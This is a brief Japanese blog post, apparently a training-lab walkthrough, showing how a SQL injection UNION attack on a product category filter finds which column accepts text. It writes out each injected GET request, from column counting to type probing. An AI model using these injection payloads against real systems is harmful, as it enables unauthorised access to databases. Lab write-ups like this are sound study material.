Hello there, ('ω')ノ
SQLインジェクションUNION攻撃でテキストを含む列の検索を。
前回に続き、今回はデータ型の模索を。
Petsカテゴリを選択して。
インターセプトして、リピータへ。
まずは、データのカラム数の確認から。
GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--
一つ目のカラムを文字列の置き換えてSendすると。
GET /filter?category=Pets'+UNION+SELECT+'abc',NULL,NULL--
次に二つ目のカラムを文字列の置き換えてSendすると成功のレスポンスが。
GET /filter?category=Pets'+UNION+SELECT+NULL,'abc',NULL--
インターセプトをオフにして確認して、表示された文字列を。
置き換えてSendすると。
GET /filter?category=Pets'+UNION+SELECT+NULL,'V0D6KE',NULL--
クリアできた。
ちなみに下記のようなリクエストをSendすると成功のレスポンスが。
これで一つ目のカラムのデータ型がわかって。
GET /filter?category=Pets'+UNION+SELECT+123,'abc',NULL--
ちなみに二つ目のカラムに指定するとエラーで。
GET /filter?category=Pets'+UNION+SELECT+NULL,123,NULL--
Best regards, (^^ゞ